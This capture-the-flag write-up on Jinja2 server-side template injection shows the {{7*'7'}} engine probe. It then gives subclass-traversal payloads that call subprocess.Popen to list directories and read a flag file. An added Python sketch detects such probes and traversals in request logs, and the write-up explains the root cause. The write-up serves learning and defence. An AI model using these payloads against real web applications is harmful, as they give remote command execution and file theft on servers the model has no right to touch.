
SSTI1

Server Side Template Injection

Identify the template engine with the payload {{7*'7'}}

It's Jinja2

Explore Jinja2 SSTI payloads

{{ ''.__class__.__mro__[1].__subclasses__() }} -> lists all subclasses; <class 'subprocess.Popen'> is at index 356

{{ ''.__class__.__mro__[1].__subclasses__()[356]('ls /', shell=True, stdout=-1).communicate() }} -> lists the contents of the root directory; challenge looks interesting

{{ ''.__class__.__mro__[1].__subclasses__()[356]('ls /challenge/', shell=True, stdout=-1).communicate() }} -> lists the contents of the web app's directory; flag spotted!

{{ ''.__class__.__mro__[1].__subclasses__()[356]('cat /challenge/flag', shell=True, stdout=-1).communicate() }} -> done!
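
Seen from the defending side, both stages above leave a recognisable trace in request logs: the arithmetic engine probe, then dunder attribute traversal inside template delimiters. The following detection sketch is an added example, not part of the original writeup; the request lines, the /announce path and the "content" parameter name are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed request lines; the /announce path and "content" parameter are assumptions.
SAMPLE_REQUESTS = [
    "GET /announce?content=hello+world HTTP/1.1",
    "GET /announce?content=%7B%7B7*%277%27%7D%7D HTTP/1.1",
    "GET /announce?content=%7B%7B%20%27%27.__class__.__mro__%5B1%5D.__subclasses__()%20%7D%7D HTTP/1.1",
    "GET /announce?content=%257B%257B7*7%257D%257D HTTP/1.1",  # double-encoded
    "GET /search?q=price+%7B+low+%7D HTTP/1.1",
]

EXPR = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.S)   # Jinja2 expression / statement
DUNDER = re.compile(r"__\w+__")                          # __class__, __mro__, ...
ARITH = re.compile(r"\s*\d+\s*\*\s*['\"]?\d+['\"]?\s*")  # 7*7 or 7*'7'


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding, bounded so hostile input cannot loop."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """Return 'object-traversal', 'engine-probe', 'template-syntax' or None."""
    verdict = None
    for match in EXPR.finditer(fully_decode(value)):
        body = match.group(1) if match.group(1) is not None else match.group(2)
        if DUNDER.search(body):
            return "object-traversal"      # highest severity wins immediately
        if ARITH.fullmatch(body):
            verdict = "engine-probe"
        elif verdict is None:
            verdict = "template-syntax"
    return verdict


def scan(request_line):
    """Classify every query parameter of one 'METHOD target VERSION' line."""
    target = request_line.split(" ")[1]
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [(name, v) for name, value in pairs if (v := classify(value))]


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(scan(line), line)
```

A hit from this scan is a signal for triage, not a fix: the root cause is user input being rendered as template source instead of being passed to the template as a variable.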